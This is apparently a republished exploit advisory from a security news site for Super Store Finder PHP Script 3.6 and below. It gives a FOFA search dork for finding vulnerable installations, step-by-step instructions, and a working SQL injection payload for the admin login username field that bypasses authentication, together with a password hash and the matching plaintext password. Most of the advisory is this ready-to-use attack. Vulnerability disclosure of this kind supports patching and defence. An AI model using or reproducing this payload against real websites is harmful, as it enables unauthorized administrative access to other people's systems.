Home Tools Exploits & CVE's Super Store Finder PHP Script 3.6 SQL Injection

Super Store Finder PHP Script 3.6 SQL Injection

July 6, 2023

303

Authored by Etharus

Super Store Finder PHP Script versions 3.6 and below suffer from a remote SQL injection vulnerability that allows for authentication bypass.

Change Mirror Download

#Title : Super Store Finder PHP Script SQL Injection / Bypass admin login
#Researcher : Etharus
#Vendor : Joe Iz, https://superstorefinder.net/
#Script Demo Url : https://superstorefinder.net/products/superstorefinder/
#Version Affected : 3.6 and below
#Date : 5 July 2023
#FOFA Dork : "designed and built by Joe Iz."
# Step 1 : Go to admin login, eg: http://localhost/store-finder/admin/
# Step 2 : Enter following payload

username : ' union select 1,'admin','32ddaaea6874e2d3eab0a9ea6ecbb0d0',4,5,6,7,8,9,10,11-- -
password : admin

Super Store Finder PHP Script 3.6 SQL Injection

Follow us on Instagram @thecyberpost

EDITOR PICKS

osCommerce 4 Cross Site Scripting

undefinedExploiting The NT Kernel In 24H2undefined

Windows NtQueryInformationThread Double-Fetch / Arbitrary Write

POPULAR POSTS

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

Sniffle – A Sniffer For Bluetooth 5 And 4.X LE

Domhttpx – A Google Search Engine Dorker With HTTP Toolkit Built...

POPULAR CATEGORY

Backdoor.Win32.EvilGoat.b MVID-2022-0619 Hardcoded Credential

WebCalendar 1.3.0 Cross Site Scripting

HackTool.Win32.Agent.gi Buffer Overflow